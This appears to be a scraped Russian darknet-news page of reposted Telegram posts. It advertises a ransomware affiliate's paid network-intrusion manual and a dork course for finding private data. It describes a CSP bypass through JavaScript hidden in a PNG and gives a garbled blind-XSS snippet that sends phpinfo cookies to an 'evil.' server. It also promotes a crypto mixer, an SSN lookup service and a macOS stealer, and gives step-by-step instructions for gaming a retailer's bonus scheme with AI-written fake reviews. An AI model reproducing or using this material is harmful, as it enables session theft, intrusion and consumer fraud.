#image_title
XSS Bassterlord объявил о продаже мануала по работе с сетями v2.0, стоимостью $10 000.
Мануал включает в себя:
– информацию о добыче доступов к компаниям по всему миру и показывает на сколько они уязвимы;
– и другие полезные заметки.
Продолжительность сделки – 3 дня
Источник:Darknet News
Просмотр поста #173 от 2020-10-10 23:00:07
Зеркало Интернета. Используем поисковые системы профессионально. Поиск приватной информацииМы используем поисковые системы каждый день для поиска той или иной информации. В этом курсе мы будем учиться это делать профессионально и делать это по шагам с практическими примерами. Вы научитесь используя поисковые системы профессионально — искать быстрее, получать более полную и более точную информацию. Вы научитесь искать приватную информацию.
Примеры практического использования навыка, который демонстрировался в курсе:
— мы увидели список пользователей знаменитой облачной crm;
— мы нашли свежие сканы личных документов;
— мы нашли закрытую базу данных клиентов компании с их контактами;
— мы много раз находили доступ к разной чувствительной информации: документы, базы, пароли, доступы;
— мы поискали релевантные страницы сайта для перелинковки;
— мы нашли таргетированные базы электронных почт под рассылку;
Огромный курс по поиску с использованием дорков в различных поисковых системах (Google, Shodan, Ya, Bing).
Изображение
Последние посты канала:
Если разработчикам внезапно пришла идея, что было бы неплохо настроить CSP в своем веб-приложении, то, как правило, не имея в этом опыта, многие часто совершают ошибки или допускают их намеренно. Например, добавляя недопустимые «unsafe-inline» и «unsafe-eval», чтобы не ловить лишний раз false positive. В данном случае мы обойдем мисконфиг с директивой img-srс на единственный доверенный внешний источник, применив магию стеганографии.
https://telegra.ph/cybred-02-11
Web-страница:
Как обойти Content Security Policy с помощью картинки из твиттера
Спрячьте вредоносную JavaScript библиотеку в PNG-изображение, создайте с ним пост в Twitter и загрузите картинку по прямой ссылке на взломанный вебсайт. Используя такой подход вы сможете с легкостью обойти Content-Security-Policy. Это не научная фантастика… это HTML Canvas. CSP заголовки все чаще благодаря своей эффективности используется для защиты от эксплуатации XSS, clickjacking и других атак с внедрением кода. Не смотря на рост популярности такого метода защиты, на многих сайтах можно найти слабые политики…
Project Apario — поисковик по рассекреченным документам с открытым исходным кодом. Создан поклонником Джона Кеннеди и теорий заговора после того, как Национальный архив опубликовал огромное количество материалов об убийстве экс-президента общим объемом более 500 000 страниц.
Изначально агрегировал и индексировал только данные, относящиеся непосредственно к убийству Кеннеди, и связанных с ним случаев, вроде расправы над Мартином Лютером Кингом. Но в настоящее время в OSINT-коллекции можно найти и другие документы на тему актуальных событий.
Кроме полезного источника документации, может послужить хорошим источников материалов для RT или Панорамы. Автор тегирует некоторые документы со своими комментариями, — от выводов про заговор Билла Гейтса и Эпштейна для чипирования, и создания медицинского фашизма, до торговли детьми, которую организует ЦРУ. Pizzagate, FauciGate, RussiaGate — все тут.
Видео/гифка, 35 сек, Screen Recording.mp4
Перевод расследования одного из участников проекта Bellingcat о недавних атаках на больницы силами безопасности Судана на фоне протестов против военного переворота, совершенного в октябре 2021 года.
https://telegra.ph/cybred-01-31
Web-страница:
Слезоточивые бомбы: как силы безопасности Судана атаковали поликлиники столицы с медперсоналом
Рассказывая о подавлении недавних протестов, Силы безопасности Судана заявили, что они выполняли свои обязанности в рамках действующего законодательства. Но как показывают свидетельства из открытых источников, силовики атаковали слезоточивым газом госпиталь, медицинских работников и пациентов в столице Судана, Хартуме. В данном отчете используются методы расследования из открытых источников для геолокации, хронолокации и анализа видеозаписей двух нападений сил безопасности на отделение скорой помощи в Судане…
awesome-privacy — очередной awesome-репозиторий на Github, наполненный, на этот раз, множеством опенсорсных программ и веб-сервисов на все случаи жизни, — начиная с менеджеров паролей и звонилок, заканчивая децентрализованными альтернативами привычным стриминговым платформам, вроде Twitch или Spotify.
Не ленитесь самостоятельно собирать все что можете — как показывает практика, исходники репозитория не всегда сходятся с исходниками автора, который заботливо оставил готовый билд в Releases.
OSINT-Библиотека, в которой суммарно собрано более сотни академических исследований, профессиональных книг, статей и документов от разных авторов на любимую многими тему разведки в сети.
Список постоянно пополняется новыми материалами, поэтому желающие могут отслеживать изменения при помощи VisualPing или Versionista.
Изображение
Манифест 12-факторного приложения — методология по созданию SaaS-приложений, которые отвечали бы современным стандартам безопасности, обладали максимальной переносимостью между средами выполнения, и подходили бы для развертывания на облачных платформах.
Некоторые факторы из манифеста: единая кодовая база, утилизируемость, явное объявление и изоляция зависимостей, безопасная передача секретов и их хранение.
Изображение
Нашел три интересных проекта, призванных дополнительно обезопасить контейнеризированные приложения и уменьшить поверхность для атаки.
Kata Containers — проект, позволяющий создавать «облегченные» виртуальные машины для разворачивания внутри них различных контейнеров. Призван сэкономить ресурсы сервера, обеспечив при этом дополнительную изоляцию за счет использования гипервизора.
Вроде как, несмотря, на описанные выше плюсы, некоторые ругают его за долгий запуск самих виртуалок. Сам не тестил, но зато нашел решение от AWS в виде Firecracker, который активно использует сам Amazon для сервисов Lambda и Fargate.
На сайте пишут, что время загрузки создаваемых виртуальных машин составляет порядка 125 миллисекунд. Такая скорость достигается благодаря тому, что разработчики вырезали из ядра всю функциональность, которая не требуется в контейнере.
Но если для кого-то и 125мс. покажется долго, на этот случай есть разработанные IBM Nabla контейнеры. Nabla контейнеры используют Unikernels образы и ограничены 7-ю сисколами — read, write, exit_group, clock_gettime, ppoll, pwrite64, и pread64. Все остальные вызовы обрабатываются в библиотечном компоненте Unikernels.
Обновлено до версии 8.4.3 от 12 января
SHA256: bc742702c5be712e604ebf7b475d6a53c3ae4f3f95fc278de22b201825abc33d
Видео/гифка
Найдя phpinfo на сайте, как показывают многие кейсы на H1, багхантеры сразу же бегут сообщать о своей находке компании, чтобы получить, как правило, минимальную выплату (особенно, когда не утекли никакие особо критичные секреты).
Многие вообще незаслуженно остаются без денег из-за «Out of Scope». Поэтому есть более интересный способ воспользоваться найденной страницей, объединив несколько багов в цепочку и увеличив тем самым критичность.
В данном случае интересует объединение phpinfo с Blind XSS. Так как сейчас тяжело встретить нужную нам куку PHPSESSID (или любую ей аналогичную) без флага HttpOnly, напрямую выкрасть ее сразу не удастся, придется обойти ограничение.
Тут нам и пригодится ранее найденный phpinfo. Не стоит забывать, что помимо информации об ОС и некоторых других, в данном случае, нам неинтересных данных, эта страница также отображает куки зашедшего на нее пользователя.
Поэтому в пэйлоаде, эксплуатирующем Blind XSS, можно сделать от имени пользователя отдельный fetch на phpinfo и спарсить его куки, которые там отобразятся, при помощи следующего регекспа /HTTP_COOKIE.+?</td><td.+?>([wW]+?)</td>/.
Далее необходимо будет доставить их на наш сервер, обойдя CORS. Это также делается достаточно просто, на примере тега script:
let scr = document.createElement('script');ml
scr.src = https://evil./?${cookie_var};scr);
document.head(
Мы добавляем его на страницу динамически и отправляем извлеченные ранее куки с phpinfo на собственный сервер, обходя политику. Все, что останется сделать — дождаться отстука и пойти проверить access логи.</td>
😉 Что связывает Полянина и Якубца?
Изображение
Показать все остальные посты
|
Мануал по работе с сетями by FishEye |
||||||
|
||||||
|
||||||
|
||||||
|
||||||
|
||||||
|
||||||
|
Поделиться
Bassterlord X LockBit
XSS: Бывший партнер REvil, Lockbit и Avaddon по имени Bassterlord (FishEye) возобновляет работу с вымогателями Lockbit с 1 марта.
RuNews|DarkNews.pro|EngNews
🪙CRYPTO SPACE GROUP – 🤔Анонимный миксер крипты. 🟢Оборвём и запутаем все цепочки связей. AML 0-25%. Снятие без верифа и документов. API подключения
SSN 24/7 — LOOKUP SSN/DOB DL BG CR CS️
Читайте на Dark News
ATOMIC MACOS STEALER SYSTEM: — Keychain (Дамп всех сохраненных паролей пользователя) — SystemInfo (Полная информация о системе) — FileGrabber (Desktop, Documents) — MacOS Password BROWSERS:…
Удаление четырех репозиториев с GitHub нарушило работу стилера RedLine
Удаление четырех репозиториев с GitHub нарушило работу стилера RedLine Специалисты компании ESET говорят, что работа малвари RedLine была нарушена благодаря удалению с GitHub нескольких репозиториев,…
А вот и продолжение истории на 7 миллионов 💵
А вот и продолжение истории на 7 миллионов 💵 Казалось бы, сервис должен уйти в блэк лист и больше никогда не появиться. Но дело оказалось…
Последнего члена таиландской группировки кардеров поймали через 14 лет скитаний по стране
Последнего члена таиландской группировки кардеров поймали через 14 лет скитаний по стране Полиция провинции Сингбури (Таиланд) сообщила об аресте 44-летней Кетканьи Кхантави (Ketkanya Khanthawee) по…
У Darknet News теперь есть…
У Darknet News теперь есть представительство в панеле Titan stealer’a.
Находившегося на испытательном сроке кардера поймали на новых преступлениях из-за вождения под наркотиками
Находившегося на испытательном сроке кардера поймали на новых преступлениях из-за вождения под наркотиками В американском городе Санта-Роза (штат Калифорния) задержали кардера, промышлявшего кражами и подделкой…
подпишись
на наш
телеграм
канал
подпишись
на наш
телеграм
канал
DARK
NEWS
🇺🇸 Darknet news (English translate)
МежФорумный 👥🛡(чат)
Сейчас СберМегаМаркет переходит на новую бонусную систему. Раньше это были бонусные баллы (значок желтые монеты, ими можно было оплатить до 50% покупки), а по новому это бонусы сберспасибо (ими можно оплатить до 99% покупки). Сложилась такая ситуация, что у некоторых людей сейчас старая система, а у некоторых новая. Будем абузить акцию «бонусные рубли за отзыв». Для этого понадобится 1500-3000 руб вложений и ваше время.
Скачиваем приложение МегаМаркет на телефон или заходим на сайт с компьютера
Заходим обязательно через Сбер ID. И ставим галочки на подключение к бонусной системе спасибо
Выбираем магазин Ашан, категорию «Дача»
Ставим фильтр самые дешевые. И набираем 100 позиций семян. Товары должны быть разные. 100 разных наименований.
Заказываем товар используя промокод на первый заказ (ищите в интернете или кому надо, напишите). Обязательно получаем заказ (можно вообще заказать в другой город на рандомный адрес и попросить оставить заказ у двери). После того как заказ «получен», заходим в него
На каждой позиции нажимаем «Написать отзыв» и собственно пишем. Отзыв должен состоять минимум из 100 символов (прочитайте требования к отзывам на сайте акции, в начале темы ссылка). Количество символов отображается при написании. После того как написали, отзыв отправляется на модерацию.
Баллы начисляются на следующий день после публикации отзыва.
Отзывы можно генерировать с помощью любой нейросети, например в телеграмме https://t.me/GPTtg_bot
Либо пользоваться другими сайтами для генерации отзывов.
Чтобы не путаться какие товары заказали а какие нет заходим в корзину перед оформлением заказа и добавляем все товары в избранное, ставим сердечки.
— За каждый отзыв получаем 70 баллов на все товары кроме продуктовых — за них 30 баллов. Суть в том, чтобы набирать товары по минимальной стоимости, как, например выше — за семена отдадим 3 рубля, а получим 70 баллов.
— По Москве самый большой выбор товара, можно заказывать курьером на какой-то адрес, потом ему сказать чтобы оставил у двери посылку.
— Для работы рассматриваем семена, канцелярию и прочие дешевые товары, кроме категории «Продукты питания»
— Разные товары собираются в один заказ, затем оставляются отзывы при помощи chatgpt, можно брать готовые отзывы и делать через нейронку рерайт отзыва.
— Первый круг идут наши затраты, используйте промокоды, дальше можно оплачивать так же бонусами сберспасибо, т.е. цена круга в разы меньше
P.S. У многих могут выскакивать ошибки при попытке в МегаМаркете подключить бонусы сберспасибо. Это никак не исправить. Можно преодолеть только периодическими попытками.
Main
Bassterlord (FishEye) Networking Manual
How much do you like this book?
What’s the quality of the file?
Download the book for quality assessment
What’s the quality of the downloaded files?
This manual is designed for beginners in the topic. But above all, for people who will work for me.
All information will be presented in the form of a manual.
There will be no meaningless explanations of how a certain exploit works and mountains of incomprehensible code, we will immediately apply it in practice.
IPFS CID:
QmbeVRPfA4bChZjnpFSHHmEhe28JvCGZUckN9S8eEgWGYC
IPFS CID blake2b:
bafykbzaced53eosengbhsiu4hg66vkqk57zxcko3lptcpptb63jum5t7qgmum
english, 2021
Begin your journey into the world of knowledge! Check out the Preview and access other features